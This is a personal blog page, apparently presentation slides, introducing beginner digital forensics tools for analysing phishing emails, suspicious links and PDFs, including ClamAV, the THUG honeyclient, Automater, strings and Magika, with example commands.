=========================
== Eduardo Robles Site ==
=========================
Hola Mundo 🌮

Easy DFIR Tools and Methods

Phishing Email Analysis

ClamAV

ClamAV is great to scan for malware but also can scan eml files including email attachments. Use the --debug flag for more info on the scan.

clamscan sample.eml

Continued

You can also use ClamAV to scan any suspicious file.

clamscan sample.zip

To investigate a link I use a REMnux container which offers so many awesome tools. I will cover THUG and Automater.

THUG

THUG is a “honeyclient”. A honeyclient is a tool that mimicks the behavior of a web browser. Useful for analyzing what a link does when a user clicks on it.

thug -u win7chrome49 "https://eduardorobles.com"

Continued…

Once it begins to “load” the suspicious site it executes any code that may be on the site. Once it is done running/loading the page it dumps a report. The report contains a summary of what occured plus you get any malicious artifacts that the page may have downloaded.

In one exercise a suspicous page downloaded an executable and I was able to analyze the executable from the container and it was indeed a malicous executable. Yikes!

Automater

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.

Continued…

Automater is a python tool found in /usr/local/automater

./Automater.py https://eduardorobles.com

Investigating a suspicious PDF

Malicous content will be embedded in a PDF. This is not immediately visible to an end user. It’s best to extract the content in order to inspect it.

Strings

You can use the command strings to view all the different system call a file contains.

strings sus_invoice.pdf | grep http

You can also pipe grep to single out things like http links or hashes.

Magika

Magika is a tool release by Google. It’s intended purpose is to accurately clasify a file. Sometime you stumble onto something and you can’t figure out what this filetype is. Magika can help with this type of analysis.

pip install magika

Thank You

If you enjoyed or found any of the content on my site helpful, you can buy me a cup of coffee or send some bitcoin ⚡ so I can continue to bring you amazing content for free!

You can Buy Me A Coffee

Tip with some Sats

Tip Some Sats ⚡

Setup

  • Keyboard: Launch Keyboard with JWICK Utlimate Black Linear switches
  • Mouse: MX Master (Original)
  • Computer: Framework 13 (Fedora Linux)